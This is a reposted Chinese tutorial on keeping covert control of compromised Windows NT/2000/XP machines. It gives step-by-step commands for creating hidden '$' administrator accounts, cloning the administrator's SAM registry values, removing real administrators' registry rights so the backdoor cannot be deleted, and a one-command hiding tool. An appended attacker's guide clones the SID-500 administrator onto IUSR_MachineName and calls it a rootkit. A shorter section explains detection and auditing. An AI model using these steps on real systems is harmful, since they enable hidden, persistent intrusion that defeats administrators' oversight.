- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
建立超级隐藏用户黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。
在肉鸡上建立一个隐藏的账户,以备需要的时候使用。
账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密。
在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的账户。
在系统中可以进入“命令提示符”,控制面板的“计算机管理”,“注册表”中对存在的账户进行查看,而管理员一般只在“命令提示符”和“计算机管理”中检查是否有异常,因此如何让系统账户在这两者中隐藏将是本文的重点。
一、“命令提示符”中的阴谋其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。
点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net userpiao$ 123456 /add”,回车,成功后会显示“命令成功完成”。
接着输入“net localgroup administrators piao$ /add”回车,这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。
建立一个简单的隐藏帐户我们来看看隐藏账户的建立是否成功。
在“命令提示符”中输入查看系统账户的命令“net user”,回车后会显示当前系统中存在的账户。
从返回的结果中我们可以看到刚才我们建立的“piao$”这个账户并不存在。
接着让我们进入控制面板的“管理工具”,打开其中的“计算机”,查看其中的“本地用户和组”,在“用户”一项中,我们建立的隐藏账户“piao$”暴露无疑。
可以总结得出的结论是:这种方法只能将账户在“命令提示符”中进行隐藏,而对于“计算机管理”则无能为力。
因此这种隐藏账户的方法并不是很实用,只对那些粗心的管理员有效,是一种入门级的系统账户隐藏技术。
二、在“注册表”中玩转账户隐藏从上文中我们可以看到用命令提示符隐藏账户的方法缺点很明显,很容易暴露自己。
那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢?答案是肯定的,而这一切只需要我们在“注册表”中进行一番小小的设置,就可以让系统账户在两者中完全蒸发。
1、峰回路转,给管理员注册表操作权限在注册表中对系统账户的键值进行操作,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”处进行修改,但是当我们来到该处时,会发现无法展开该处所在的键值。
这是因为系统默认对系统管理员给予“写入D AC”和“读取控制”权限,没有给予修改权限,因此我们没有办法对“SAM”项下的键值进行查看和修改。
不过我们可以借助系统中另一个“注册表编辑器”给管理员赋予修改权限。
点击“开始”→“运行”,输入“regedt32.exe”后回车,随后会弹出另一个“注册表编辑器”,和我们平时使用的“注册表编辑器”不同的是它可以修改系统账户操作注册表时的权限(为便于理解,以下简称regedt32.exe)。
在regedt32.exe中来到“HKEY_LOCAL_MACHINE\SAM\SAM”处,点击“安全”菜单→“权限”,在弹出的“SAM的权限”编辑窗口中选中“administrators”账户,在下方的权限设置处勾选“完全控制”,完成后点击“确定”即可。
然后我们切换回“注册表编辑器”,可以发现“HKEY_LOCAL_MACHINE\SAM\SAM”下面的键值都可以展开了。
给管理员赋予操作权限提示:上文中提到的方法只适用于Windows NT/2000系统。
在Windows XP系统中,对于权限的操作可以直接在注册表中进行,方法为选中需要设置权限的项,点击右键,选择“权限”即可。
2、偷梁换柱,将隐藏账户替换为管理员成功得到注册表操作权限后,我们就可以正式开始隐藏账户的制作了。
来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户。
点击我们的隐藏账户“piao$”,在右边显示的键值中的“类型”一项显示为0x3e9,向上来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\”处,可以找到“000003E9”这一项,这两者是相互对应的,隐藏账户“piao$”的所有信息都在“000003E9”这一项中。
同样的,我们可以找到“administrator”账户所对应的项为“000001F4”。
将“piao$”的键值导出为piao$.reg,同时将“000003E9”和“000001F4”项的F键值分别导出为user.reg,admin.reg。
用“记事本”打开admin.reg,将其中“F”值后面的内容复制下来,替换user.reg中的“F”值内容,完成后保存。
接下来进入“命令提示符”,输入“net user piao$ /del”将我们建立的隐藏账户删除。
最后,将piao$.reg和user.reg 导入注册表,至此,隐藏账户制作完成。
复制F值内容3、过河拆桥,切断删除隐藏账户的途径虽然我们的隐藏账户已经在“命令提示符”和“计算机管理”中隐藏了,但是有经验的系统管理员仍可能通过注册表编辑器删除我们的隐藏账户,那么如何才能让我们的隐藏账户坚如磐石呢?打开“regedt32.exe”,来到“HKEY_LOCAL_MACHINE\SAM\SAM”处,设置“SAM”项的权限,将“administrators”所拥有的权限全部取消即可。
当真正的管理员想对“HKEY_LOCAL_MACHINE\SAM\SAM”下面的项进行操作的时候将会发生错误,而且无法通过“regedt32.exe”再次赋予权限。
这样没有经验的管理员即使发现了系统中的隐藏账户,也是无可奈何的。
三.专用工具,使账户隐藏一步到位虽然按照上面的方法可以很好得隐藏账户,但是操作显得比较麻烦,并不适合新手,而且对注册表进行操作危险性太高,很容易造成系统崩溃。
因此我们可以借助专门的账户隐藏工具来进行隐藏工作,使隐藏账户不再困难,只需要一个命令就可以搞定。
我们需要利用的这款工具名叫“HideAdmin”,下载下来后解压到c盘。
然后运行“命令提示符”,输入“HideAdmin piao$ 123456”即可,如果显示“Create a hiden Administrator piao$ Successed!”,则表示我们已经成功建立一个账户名为piao$,密码为123456的隐藏账户。
利用这款工具建立的账户隐藏效果和上文中修改注册表的效果是一样的。
四、把“隐藏账户”请出系统隐藏账户的危害可谓十分巨大。
因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统1、添加“$”符号型隐藏账户对于这类隐藏账户的检测比较简单。
一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限。
那么我们只需要在“命令提示符”中输入“net localgroup administrators”就可以让所有的隐藏账户现形。
如果嫌麻烦,可以直接打开“计算机管理”进行查看,添加“$”符号的账户是无法在这里隐藏的。
2、修改注册表型隐藏账户由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到注册表中删除隐藏账户。
来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”,把这里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。
想要删除它也很简单,直接删除以隐藏账户命名的项即可。
3、无法看到名称的隐藏账户如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。
那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建立的隐藏账户名称。
不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。
点击“开始”→“运行”,输入“gpedit.msc”运行“组策略”,依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后点“确定”。
对“审核登陆事件”和“审核过程追踪”进行相同的设置。
开启登陆事件审核功能进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。
即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账户就暴露无疑了。
通过事件查看器找到隐藏帐户得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限。
但是我们可以在“命令提示符”中输入“net user 隐藏账户名称654321”更改这个隐藏账户的密码。
这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆。
克隆管理员帐号的方法经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。
首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。
运行一个System的CMD Shell( /scripts/173.htm 或使用/soft/psu.exe),然后在该CMD Shell里面运行regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg 文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的'1F4'修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的'1F4'修改为'3E9'后执行regedit /s adam.reg导入该Reg文件然后运行net user IUSR_MachineName Sometips修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)OK,大功告成...这样,我们拥有和默认管理员一样的桌面、一样的Profile.....而且,当我们运行 net localgroup administrators 时,看看结果:C:\>net localgroup administratorsAlias name administratorsComment Administrators have complete and unrestricted access to the computer/domainMembers------------------------------------------------------------------------------- AdministratorThe command completed successfully.再看看USER2SID的输出结果:C:\>user2sid AdministratorS-1-5-21-48-49-8-500Number of subauthorities is 5Domain is IDONTKNOWLength of SID in memory is 28 bytesType of SID is SidTypeUserC:\>user2sid iusr_machinenameS-1-5-21-48-49-8-1001Number of subauthorities is 5Domain is IDONTKNOWLength of SID in memory is 28 bytesType of SID is SidTypeUser我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)^_^,这算不算RootKit...附:1、感谢叮叮付出需要reinstall OS的代价...2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持...----------------------------------------------------------------------------- 叮叮的补充完善很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。